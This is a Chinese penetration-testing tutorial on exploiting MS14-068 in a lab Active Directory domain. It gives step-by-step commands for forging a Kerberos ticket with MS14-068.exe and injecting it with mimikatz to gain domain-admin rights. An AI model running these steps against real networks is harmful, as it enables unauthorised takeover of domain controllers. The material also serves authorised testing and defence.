0x00 前言


在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。

0x01 准备工作


  1. 域成员账号及密码一个
  2. mimikatz
  3. ms14-068.exe
  4. 03以上服务器或pc

0x02 模拟环境


域控制器 2008r2 dc.test.com 192.168.3.100
域内机器 2008r2 client.test.com 192.168.3.10

0x03 漏洞自检


MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测

systeminfo |find "3011780"

域***提权之MS14-068_第1张图片

为空则代表没有打该补丁,存在漏洞!
如果属于黑盒测试,并没有直接操作域控制器的权限,那么只能使用该漏洞,看是否能成功伪造域管理员登录来验证

0x04 漏洞利用


1. 获取域成员sid

获取域成员sid的方式有多种,当然前提是建立在0x01上,本次使用最为简单的命令获取

whoami /all  #该命令获取当前登录用户的信息,这里使用的是域成员登录,所以获取到的是域成员normal的sid

域***提权之MS14-068_第2张图片

2. 生成TGT票据

使用ms14-068.exe,网上有多种版本,有python脚本(需要在***机上安装python2.x版本,略麻烦),也有已经从python转exe的版本,不需要依赖python环境,下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

C:\Users\normal\Desktop>MS14-068.exe
USAGE:
MS14-068.exe -u @ -s  -d 

OPTIONS:
    -p 
 --rc4 

C:\Users\normal\Desktop>MS14-068.exe -u [email protected] -s S-1-5-21-1406004368-3
818689962-3591297438-1105 -d 192.168.3.100 -p Server1
  [+] Building AS-REQ for 192.168.3.100... Done!
  [+] Sending AS-REQ to 192.168.3.100... Done!
  [+] Receiving AS-REP from 192.168.3.100... Done!
  [+] Parsing AS-REP from 192.168.3.100... Done!
  [+] Building TGS-REQ for 192.168.3.100... Done!
  [+] Sending TGS-REQ to 192.168.3.100... Done!
  [+] Receiving TGS-REP from 192.168.3.100... Done!
  [+] Parsing TGS-REP from 192.168.3.100... Done!
  [+] Creating ccache file '[email protected]'... Done!

使用方法:
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件
域***提权之MS14-068_第3张图片
域成员密码错误情况图

3. 票据注入

使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

mimikatz # kerberos::purge      //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件         //将票据注入到内存中

域***提权之MS14-068_第4张图片
当显示injecting ticket ok时,表示已经成功将票据注入到内存中,可在机器中用klist查看
域***提权之MS14-068_第5张图片

4.测试

伪造后,进行尝试访问域控制器
域***提权之MS14-068_第6张图片

注入票据前是不能访问的
域***提权之MS14-068_第7张图片

0x05 细节


  1. 注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入,听大佬说过有工具可以注入,希望有知道的朋友可以留言
    域***提权之MS14-068_第8张图片

  2. 当获取到域用户、域用户sid、密码以及可访问到域控制器的机器,并不需要机器一定在域中(如***者通过***等拨入内网),但需要把dns指向域控制器才能解析
  3. 访问域控制器时,需要使用主机名,不能使用ip
    域***提权之MS14-068_第9张图片
  4. 如有错误,请指正,万分感谢